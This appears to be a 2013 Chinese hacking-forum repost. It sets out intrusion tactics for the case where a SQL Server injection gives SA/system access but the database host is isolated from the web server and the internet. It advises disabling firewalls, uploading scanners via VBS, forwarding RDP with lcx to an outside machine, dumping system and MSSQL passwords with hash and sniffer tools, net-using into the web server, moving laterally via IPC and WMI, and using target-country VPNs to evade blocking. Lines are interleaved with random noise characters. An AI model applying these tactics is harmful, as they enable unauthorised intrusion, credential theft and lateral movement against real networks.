当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
4 K8 x4 h/ k9 H d0 t% H9 X! `% J) ]$ i% s2 l
5 X; G4 u% w6 p0 x+ c/ R1 M3 m( e6 d* J2 I5 A( |+ i
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
9 O& k- E9 }! \$ i+ {9 H5 a
9 u9 u# s/ b! J1 G0 i
! f( g7 x ?( k; O一、DB机有公网IP.) j) w8 l: q/ w! Q- _4 E; M1 D
/ j' u$ j, u7 O
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.) P- I& t6 L% x7 e) I
; I t r( i, {- H3 H
: o D; N" q2 A6 W" r; G2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
! v$ Z) K3 F/ y; Y. b
* ~( N% {0 I- C! z) ^4 \! A8 L
! i' c& g1 g2 a6 D- i3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
& R; a; M, v. S F
9 L# h `9 K" L C6 O
! w7 j- |* }5 Y# y& c5 F& J4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
* n P: |4 {# D* Q- H' q2 ]5 s& P4 G0 I7 g& v& k8 ^
9 I% F1 R! @2 _8 [
- D$ _- g2 T' `! N- y5 F5 b9 J7 C L二、DB机只有内网IP, k4 X1 k1 D; i. |
, o5 ] @% C' _- t1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
+ V" k$ a2 L1 }3 V+ J% E* ^5 C* ]% l( U: u3 G3 J& t. M
! |" e1 |7 y: Z! ~+ g
2:停掉防火墙和IP策略再从内往外扫描.
3 ?- @6 }0 i' s, h" N: e5 B: n
' v0 G2 r' B1 o! D2 g$ |
# l5 G5 i5 `/ a3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的./ y4 [( V3 p! m, @
& G9 c4 E' V0 | X+ Z! @% S" P+ _
, K7 n; d) {! B# {4:学会密码规律分析往往会有惊喜.
& d9 s$ l" i: k* ~* z; ]$ ]9 F3 A/ Z: S# F z9 O
7 x0 X, A+ p9 B; k% H2 n; J
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
8 `( V- D6 q5 ^. M( `; n; }
3 j7 M& c3 a" S2 I( ^1 W7 c
5 i; s& C4 b0 I& ]1 a8 v- i% X有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对